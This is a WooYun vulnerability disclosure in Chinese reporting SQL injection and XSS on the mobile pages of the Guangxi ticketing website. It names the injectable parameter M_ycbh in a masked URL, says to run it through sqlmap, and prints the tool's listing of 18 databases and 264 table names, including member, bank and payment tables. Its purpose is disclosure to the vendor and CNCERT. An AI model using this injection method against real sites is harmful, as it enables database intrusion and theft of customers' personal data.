漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0152492
漏洞标题:广西票务网移动端页面存在SQL注入,XSS。数十万信息泄漏
相关厂商:广西票务网
漏洞作者: 水系cmos
提交时间:2015-11-08 20:01
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
广西票务网在乌云已经有两个洞,然而我今天又发现了另外一处注入和XSS,但是我发现厂家是忽略状态,希望厂家重视啊~~~(幸苦没在这儿买过票 2333····
详细说明:
http://**.**.**.**/perform_qpdj2.aspx?jw=280.00&m=0.23174629407003522&vM_ycbh=*&ycsj=2015/12/29 20:00:00&_=1446744997956
参数:M_ycbh存在注入
直接丢进Sqlmap跑。
漏洞证明:
available databases [18]:
[*] card950
[*] gxpiao_jxc
[*] gxpwdb
[*] gxpwdraw02
[*] gxpwdraw03
[*] gxpwmember_lzys
[*] gxpwticket_wz
[*] hypiaodb
[*] master
[*] microeticket
[*] model
[*] msdb
[*] qitangdb
[*] tempdb
[*] testticket
[*] wagaticket
[*] weipiao_wap
[*] weipiao_web
Database: gxpwdb
[264 tables]
+----------------------------+
| AppDownInfo |
| AppFeedBack |
| AppMobileCount |
| AppMobileLogin |
| AppMobileLogin |
| AppMobilePoLogin |
| AppPrizeList |
| AppPrizeRecord |
| AppPrizeUser |
| AppWeixinLog |
| CM_CG_Fjb |
| CM_CG_FpdMx |
| CM_CG_FpdMx |
| CM_CG_SpcfMx |
| CM_CG_Spcfd |
| CM_CG_Sppc |
| CM_CG_SpzzMx |
| CM_CG_Spzzd |
| CM_CG_ddMx |
| CM_CG_ddMx |
| CM_CG_fkdMx |
| CM_CG_fkdMx |
| CM_CG_pddMx |
| CM_CG_pddMx |
| CM_CG_thdMx |
| CM_CG_thdMx |
| CM_CK_CkdMx |
| CM_CK_Ckdb |
| CM_CK_Ckdb |
| CM_CK_Rkdb |
| CM_CK_Rkdb |
| CM_CK_Yj |
| CM_CK_dbdMx |
| CM_CK_dbdMx |
| CM_CK_rkdMx |
| CM_CW_Gdzcgl |
| CM_CW_Zcd |
| CM_CW_Zjsrd |
| CM_CW_Zzd |
| CM_CW_cwkm |
| CM_Jxc_Gysfl |
| CM_Jxc_Gysxx |
| CM_Jxc_Khfl |
| CM_Jxc_Khxx |
| CM_Jxc_Spfzb |
| CM_Jxc_Splb |
| CM_Jxc_Spxx |
| CM_Jxc_Spzzb |
| CM_OA_Bwl |
| CM_OA_Skk |
| CM_OA_Ssap |
| CM_OA_Ssap |
| CM_OA_Ssfj |
| CM_OA_Txfs |
| CM_OA_Ygssb |
| CM_Qt_XS_Hyjfkj |
| CM_Qt_XS_Hykjb |
| CM_Qt_XS_Hykzl |
| CM_Qt_XS_Khda |
| CM_Qt_XS_Qtjjb |
| CM_Qt_XS_QtthMx |
| CM_Qt_XS_QtthMx |
| CM_Qt_XS_QtxsMx |
| CM_Qt_XS_Qtxsdp |
| CM_Qt_XS_Qtxsdp |
| CM_XS_FpdMx |
| CM_XS_FpdMx |
| CM_XS_KpdMx |
| CM_XS_KpdMx |
| CM_XS_xsckdMx |
| CM_XS_xsckdMx |
| CM_XS_xsddMx |
| CM_XS_xsddMx |
| CM_XS_xsskdMx |
| CM_XS_xsskdMx |
| CM_XS_xsthdMx |
| CM_XS_xsthdMx |
| CM_Xtrz |
| CM_Xtrzxm |
| CM_Yj_Gyszkye |
| CM_Yj_Khzkyj |
| CM_ZtManagement |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| JC_Airport |
| Jb_Rygw |
| Jc_Bm |
| Jc_Button |
| Jc_Ck |
| Jc_Dw |
| Jc_Dy_CK_Bm |
| Jc_Dy_Menu_Button |
| Jc_Dy_Role_System |
| Jc_Dy_Users_Gw |
| Jc_Dy_Users_Role |
| Jc_GnWeb |
| Jc_Jmgxx |
| Jc_Kjqj |
| Jc_Mj |
| Jc_Role |
| Jc_Ryda |
| Jc_Rygwb |
| Jc_SystemMenu |
| Jc_SystemMenu |
| Jc_Users |
| Jc_Xtcs |
| Jc_YhGzzm |
| Jc_YhZc |
| Jc_airtype |
| M_Advertis |
| M_AdvertisType |
| M_AgenPrice |
| M_ApplyDetailTable |
| M_ApplyTable |
| M_Area |
| M_Cuxiao |
| M_Ddlczt_bak |
| M_Ddlczt_bak |
| M_Ddzt |
| M_Fapiao |
| M_Fenxiao_Mb_Mx |
| M_Fenxiao_Mb_Mx |
| M_Fenxiao_log |
| M_Fenxiao_sjjg |
| M_Flight |
| M_HomePageCfg_UnWork2 |
| M_HomePageCfg_UnWork2 |
| M_HomePageCfg_Working2 |
| M_HomePageCfg_Working2 |
| M_HotelInfo_JD_Mx |
| M_HotelInfo_JD_Mx |
| M_HotelInfo_JD_Mx |
| M_HotelInfo_Mx |
| M_Integral |
| M_Member_bank |
| M_Member_bank |
| M_Menpiao_Mx |
| M_Menpiao_hd |
| M_Menpiao_hd |
| M_MovieSite |
| M_MovieTime |
| M_Movie_Mx |
| M_Movie_Mx |
| M_Perform_Config |
| M_Perform_cc |
| M_Perform_cc |
| M_Perfrom_JD_MX |
| M_Perfrom_JD_MX |
| M_Perfrom_jw |
| M_Perfrom_yccg |
| M_Psfs |
| M_QA |
| M_RedirectPage |
| M_SecondBuy |
| M_Spdz |
| M_Splike |
| M_Substation |
| M_UserCollect |
| M_Voucher_MX |
| M_Voucher_MX |
| M_Xianlu_hd |
| M_Zcsx |
| M_about |
| M_airline_JD_Mx |
| M_airline_JD_Mx |
| M_airline_JD_PNR |
| M_airline_Xx |
| M_codeMachine |
| M_codeMachine |
| M_dianzipiao_Mx |
| M_dianzipiao_Mx |
| M_hotSearch |
| M_inMoney |
| M_member_moneyCash |
| M_member_moneyCash |
| M_member_value |
| M_menpiao_JD2 |
| M_menpiao_JD_Mx2 |
| M_menpiao_JD_Mx2 |
| M_menpiao_JD_Mx2 |
| M_merchant_group |
| M_merchant_group |
| M_merchant_user |
| M_message |
| M_mooncake_Dst |
| M_mooncake_Dst |
| M_mooncake_FL |
| M_mooncake_JD_MX |
| M_mooncake_JD_MX |
| M_movieTicket_JD_Mx |
| M_movieTicket_JD_Mx |
| M_movieTicket_JD_Mx |
| M_project |
| M_qpdj |
| M_subject |
| M_telList |
| M_xianlu_JD_Mx |
| M_xianlu_JD_Mx |
| M_xianlu_Mx |
| M_xianlu_back |
| M_xianlu_back |
| M_ycyd |
| NFCUser |
| N_HireInfo |
| N_News |
| SMS_MO_meeting |
| SMS_MO_meeting |
| SMS_Verifi_reply |
| SMS_Verifi_reply |
| SMS_Verifi_txt |
| SMS_meeting |
| SMS_meeting |
| Sys_Table_No |
| UV_CM_CG_dd |
| UV_CM_CG_rkd |
| UV_CM_GnQx |
| UV_Fenxiao_MX |
| UV_GXPW_Pay |
| UV_Jc_Users |
| UV_Menu_Button |
| UV_Moon_Pay |
| UV_MovieTicket_JD |
| UV_MovieTicket_Time |
| UV_Order_recycling |
| UV_Perform_Phone |
| UV_Perfrom_jd_fenxiao |
| UV_Perfrom_jd_fenxiao |
| UV_Ry |
| UV_Splb_Spxx |
| UV_Spxx_Spfzb |
| UV_User_Orders |
| UV_User_menpiao |
| UV_User_xianlu |
| UV_Users_Role |
| UV_airticket_caiwu |
| UV_airticket_caiwu |
| UV_menpiao_JD_Count_report |
| UV_menpiao_JD_report |
| UV_menpiao_jd_fenxiao |
| UV_message |
| UV_perform_All |
| UV_perform_cg |
| UV_perfrom_jd_MX |
| UV_user_mooncake |
| UV_user_qpdj |
| UV_xianlu_JD_report |
| View_1 |
| View_2 |
| View_3 |
| View_4 |
| View_5 |
| View_6 |
| View_ycmc |
| W_JingDian_OnlineCfg |
| W_SUBSTATION_CFG |
| W_SubStation_Pos |
| YoungTb |
| audit_table |
| buser |
| errCode |
| m_JD_number |
| pangolin_test_table |
| vM_menpiao_hd |
+----------------------------+
信息泄漏:
反射型XSS:
修复方案:
过滤
版权声明:转载请注明来源 水系cmos@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-11-19 18:26
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广西分中心,由广西分中心后续协调网站管理单位处置。
最新状态:
暂无